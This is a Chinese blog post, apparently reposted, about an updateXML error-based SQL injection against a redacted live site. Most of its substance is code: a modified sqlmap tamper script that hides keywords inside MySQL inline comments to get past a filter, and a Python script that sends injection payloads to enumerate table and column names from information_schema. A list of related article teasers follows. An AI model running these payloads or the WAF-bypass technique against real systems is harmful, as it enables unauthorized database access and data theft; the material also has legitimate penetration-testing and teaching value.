updateXML 注入 python 脚本

最新推荐文章于 2023-12-28 16:21:23 发布
最新推荐文章于 2023-12-28 16:21:23 发布
阅读量166 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: python php 数据库
原文链接:http://www.cnblogs.com/MiWhite/p/7062207.html
本文介绍了一个使用updateXML注入技巧进行SQL注入攻击的实际案例。通过手工构造SQL注入语句,作者成功获取了目标数据库中的表名及字段信息。此外,还分享了如何绕过常见防御措施并实现对数据库的有效渗透。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

用SLQMAP来跑updateXML注入发现拦截关键字,然后内联注入能绕,最后修改halfversionedmorekeywords.py脚本,结果SQLMAP还是跑不出来。>_<

halfversionedmorekeywords.py脚本修改后如下:

#!/usr/bin/env python


import os
import re

from lib.core.common import singleTimeWarnMessage
from lib.core.data import kb
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY
from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS

__priority__ = PRIORITY.HIGHER

def dependencies():
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.1" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

def tamper(payload, **kwargs):

    def process(match):
        word = match.group('word')
        if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
            return match.group().replace(word, "/*!12345 %s*/" % word)
        else:
            return match.group()

    retVal = payload

    if payload:
        retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal)
        retVal = retVal.replace(" /*!0", "/*!0")

    return retVal

 

自己写个脚本得了,于是有了以下代码,成功跑出表名和字段。

#coding=utf-8


import requests
import re, binascii, warnings, time
warnings.filterwarnings("ignore")


table_name_list = []

for k in range(1,112):
    #遍历表名
    url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&" \
          "searchopt=content&searchkey=1' /*!and*//*!updateXML*/" \
          "(1,concat(0x7e, (select /*!table_name*/ /*!from*/ information_schema.tables limit " + str(k) + ",1),0x7e),3)-- -" \
          "&x=4&y=23"

    req = requests.get(url)

    a = re.findall(r"'~(.*)~'", req.text)

    if a:table_name_list.append(a[0])
    else:pass

print table_name_list

for i in  table_name_list:
    print u"表名为:",i #输出表名
    #遍历字长度
    url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&searchopt=content&searchkey=1" \
          "' /*!and*//*!updateXML*/(1,concat(0x7e, " \
          "(/*!SELECT*/ /*!distinct*/ concat(0x7e,/*!count(column_name)*/,0x7e) /*!FROM*/ /*!information_schema.columns*/ " \
          "where /*!table_name=0x"+str(binascii.b2a_hex(i))+"*/ ),0x7e),3)-- -&x=4&y=23"

    req = requests.get(url)

    b = re.findall(r"'~(.*)~'",req.text)

    if b:
        m = int(b[0].strip("~"))+1
        print u"行数为:",m #输出行数
        for n in range(1,m):
            #遍历字段名
            url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&searchopt=content&searchkey=1" \
                  "' /*!and*//*!updateXML*/(1,concat(0x7e, " \
                  "(/*!SELECT*/ /*!distinct*/ concat(0x7e,/*!column_name*/,0x7e) /*!FROM*/ /*!information_schema.columns*/ " \
                  "where /*!table_name=0x"+str(binascii.b2a_hex(i))+"*/ limit "+str(n)+",1),0x7e),3)-- -&x=4&y=23"

            req = requests.get(url)

            c = re.findall(r"'~(.*)~'", req.text)
            if c:print u"字段:",str(c).strip("[u'~").strip("~']")
            else:pass
    else:pass

收工,提漏洞。拜拜。

转载于:https://www.cnblogs.com/MiWhite/p/7062207.html

Web安全测试(四):XML注入和代码注入
ml202187的博客
08-29 1239
**通过本章节,我们会学到:** 1. XML注入概念 2. 了解什么是XML注入漏洞 3. 了解XML注入漏洞产生的原因 4. XML注入漏洞检测与防护 5. 掌握XML注入漏洞的利用方式 6. 掌握如何修复XML注入漏洞 7. 代码注入概念 8. 代码注入的类型及防御
Injection Attacks-XML注入
weixin_34092455的博客
03-11 316
注入攻击 XML注入 虽然JSON的出现实现了服务器与客户端之间的“轻量级”数据交流,但是,作为另一种流行的可行方案,许多web服务API同时还是继续支持XML。另外,除了web服务之外,XML也是许多使用XML schemas 实行数据交换的协议的基础,例如RSS,Atom,SOAP,以及RDF等等,举不胜举。 XML无处不在:它存在于...
Python对XML进行操作
笔记流
02-07 651
1.构建xml文件# -*- coding: utf-8 -*- import xml.etree.ElementTree as ETroot = ET.Element("html") head = ET.SubElement(root, "head") title = ET.SubElement(head, "title") title.text = "Title"body = ET.SubEle
python解析外部实体_XML外部实体(XXE)注入详解
weixin_39818631的博客
12-04 673
###XML与xxe注入基础知识1.XMl定义XML由3个部分构成,它们分别是:文档类型定义(Document Type Definition,DTD),即XML的布局语言;可扩展的样式语言(Extensible Style Language,XSL),即XML的样式表语言;以及可扩展链接语言(Extensible Link Language,XLL)。XML:可扩展标记语言,标准通用标记语言的子...
基于XML注入
欢迎阅读我的博客
03-18 531
准备一个UserDao类和UserService类 , 其中 UserService类中有UserDao类型的属性 注入外部Bean(常用) 注入外部Bean的方式:在外部注册一个bean, 然后通过外部bean的id配合property标签的ref引用属性进行注入 注入内部Bean(了解) 注入内部Bean的方式:在bean标签中嵌套bean标签 , 内部bean的id是没有用的 , 不能通过容器被获取到所以不用写id set 注入的核心实现原理 set注入是基于set方法实现的,底层会通过反射机制调用属
Python操作XML教程:读取、写入、修改和保存XML文档
热门推荐
专注于Python编程技术的分享与交流,致力于帮助开发者提升编程技能,解决实际问题,探索Python的无限可能。
05-22 3万+
XML是一种常见的数据交换格式,在许多应用中都被广泛使用。通过掌握Python操作XML的基础知识,您将能够轻松地处理XML数据,从而实现数据的提取、修改和存储。这是一个简单的Python操作XML的教程,涵盖了读取、写入、修改和保存XML文档的基本步骤。通过遍历根元素和其子元素,可以访问XML文档中的各个元素和其属性。模块,该模块提供了解析和操作XML文档的功能。方法将修改后的XML文档保存到文件中。函数解析XML文档。对象,表示整个XML文档的树结构。属性修改元素的文本内容,使用。方法修改元素的属性。
updatexml 注入使用的问题
最新发布
04-02
以下是基于 Python 编写的简单模拟脚本,它展示了如何自动化探测远程主机上潜在的安全隐患状况: ```python import requests url = "http://target-site.com/vulnerable-script.php" payloads = [ "' AND ...
python脚本模板(用于sqli-labs实验)
qq_42529356的博客
02-13 558
目录UNION联合注入 python脚本模板error报错注入 python脚本模板bool布尔注入 python脚本模板time延时盲注 python脚本模板 UNION联合注入 python脚本模板 import requests import threading import queue from lxml import etree import re NUM=5 #线程数 LIST=[] headers = {'user-agent': 'Mozilla/5.0 (Windows NT 1
基于dvwa的自动化sql注入脚本
altersueyunsheng的博客
05-27 566
基于DVWA的自动化注入脚本 SQL注入 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式 进行展示; 增加了 图片拖拽 功能,你可以将本地的图片直接拖拽到编辑区域直接展示; 全新的 KaTeX数学公式 语法; 增加了支持甘特图的mermaid语法1 功能; 增加了 多屏幕编辑 M
Sqlmap速查表/功能移植/Python批量检测SQL注入
浪子燕青的博客
03-11 1660
title: Sqlmap速查表与Python进行功能移植 copyright: true top: 0 date: 2021-02-27 11:59:00 tags: [扫描注入,注入,sqlmap] categories: 安全开发 permalink: password: keywords: description: Sqlmap速查,对其WAF识别功能移植,对其Sql注入的payload进行移植,完成Python批量检测SQL注入。 今天的剑桥对我而言只是一百年前那个剑桥的幻影,但我还会不由自主.
sql盲注之报错注入(附自动化脚本)
xiaoi123的博客
12-29 4824
作者:__LSA__ 0x00 概述 渗透的时候总会首先测试注入,sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是盲注了,此文是盲注系列的第一篇,介绍盲注中的报错注入。 0×01 报错注入原理 其实报错注入有很多种,本文主要介绍几种常见的报错方法,有新姿势后续再更新。 1. Duplicate
XML注入学习
xujunhui222的博客
02-10 7629
一、什么是XML注入 XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3C 的推荐标准 简单来说xml就是用来存储数据的。 二、XML的特点 XML仅仅是纯文本,他不会做任何事情。 XML可以自己发明标签(允许定义自己的标签和文档结构) 三、XML的定义 首先是XML声明,然后是DTD
黑盒渗透测试指导之XML注入
pingziaaa的博客
06-10 1155
一.攻击场景 流星资源网,各类源码,游戏源码,QP源码 直接发送XML请求 描述 许多应用系统或组件均需要发送xml请求(get或post请求)到后台进行处理,通过识别前台发送至后台的xml请求,并使用代理拦截工具截取请求,利用XXE攻击方法修改xml请求体进行测试, 测试方法 首先查找直接发送xml请求的链接,例如抓到以下链接,如,https://127.0.0.1:8443/test/test.action其提交的post参数中有以下参数,如: req=<?xml versio..
【网络安全】web漏洞-xml外部实体注入(XXE)
A1_3_9_7的博客
12-28 1311
xml可拓展标记语言:xml是一种可拓展的标记语言,可以用来存储数据,例如:我们经常看到一些.xml的文件;它还可以用来传输数据,我们可以直接将数据以xml的格式放在请求当中,发给服务器。XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。
web漏洞-xml外部实体注入(XXE)
网络空间安全学习
10-09 2493
XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题",也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
XML 注入
发哥微课堂
06-15 8137
0x00:简介 首先先简单的说一下 xml,看一下它的全名称,叫 Xtensible Markup Language,即可扩展的标记语言,可直接理解为内容可自定义扩展,标签可自定义扩展。其实就是一个文本格式的文件,以 xml 结尾,里面的标签内容可以自定义。它具有很清晰的层次结构,便于阅读,经常被用来做配置文件和存储数据。web 中用 xml 格式来传输数据和处理的功能也有很多。而后端没有对 x...
MYSQL ExtractValue、UpdateXml报错注入详解
AaronLuo
08-26 2732
MYSQL Extractvalue 报错注入 Extractvalue() 函数 使用XPath表示法从XML字符串中提取值 参数 xml_frag, xpath_expr xml_frag: 目标xml文档 xpath_expr: 利用Xpath路径法表示的查找路径 报错原理:Xpath格式语法书写错误的话,就会报错 例如 SELECT extractvalue('<a&gt...
XXE漏洞利用技巧(XML注入):从XML到远程代码执行
墨痕诉清风的博客
10-12 5113
如今的 web 时代,是一个前后端分离的时代,有人说 MVC 就是前后端分离,但我觉得这种分离的并不彻底,后端还是要尝试去调用渲染类去控制前端的渲染,我所说的前后端分离是,后端 api 只负责接受约定好要传入的数据,然后经过一系列的黑盒运算,将得到结果以 json 格式返回给前端,前端只负责坐享其成,拿到数据json.decode 就行了(这里的后端可以是后台代码,也可以是外部的api 接口,这里的前端可以是传统意义的前端,也可以是后台代码)我们以存在 XXE 漏洞的服务器为我们探测内网的支点。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值